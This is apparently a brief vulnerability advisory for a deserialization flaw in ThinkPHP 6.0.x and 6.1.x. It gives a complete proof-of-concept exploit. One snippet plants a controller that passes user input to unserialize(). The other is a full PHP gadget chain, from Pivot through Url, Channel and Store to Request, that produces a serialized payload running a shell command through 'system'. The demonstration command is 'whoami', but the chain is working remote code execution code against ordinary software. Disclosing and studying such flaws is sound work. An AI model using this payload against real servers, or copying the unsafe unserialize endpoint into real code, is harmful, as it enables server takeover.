thinkphp 6.0.0-6.0.13 and 6.1.0-6.1.1 contains a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload.
First, Add new deserialization endpoint, such as:
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index($payload)
{
unserialize($payload);
}
}Now, you can generate payload from:
<?php
namespace think {
abstract class Model
{
private $lazySave = true;
private $data = ['a' => 'b'];
private $exists = true;
protected $withEvent = false;
protected $readonly = ['a'];
protected $relationWrite;
private $relation;
private $origin = [];
public function __construct($value)
{
$this->relation = ['r' => $this];
$this->origin = ["n" => $value];
$this->relationWrite = ['r' =>
["n" => $value]
];
}
}
class App
{
protected $request;
}
class Request
{
protected $mergeParam = true;
protected $param = ["whoami"];
protected $filter = "system";
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
}
}
namespace think\route {
use think\App;
class Url
{
protected $url = "";
protected $domain = "domain";
protected $route;
protected $app;
public function __construct($route)
{
$this->route = $route;
$this->app = new App();
}
}
}
namespace think\log {
class Channel
{
protected $lazy = false;
protected $logger;
protected $log = [];
public function __construct($logger)
{
$this->logger = $logger;
}
}
}
namespace think\session {
class Store
{
protected $data;
protected $serialize = ["call_user_func"];
protected $id = "";
public function __construct($data)
{
$this->data = [$data, "param"];
}
}
}
namespace {
$request = new think\Request(); // param
$store = new think\session\Store($request); // save
$channel = new think\log\Channel($store); // __call
$url = new think\route\Url($channel); // __toString
$model = new think\model\Pivot($url); // __destruct
echo urlencode(serialize($model));
}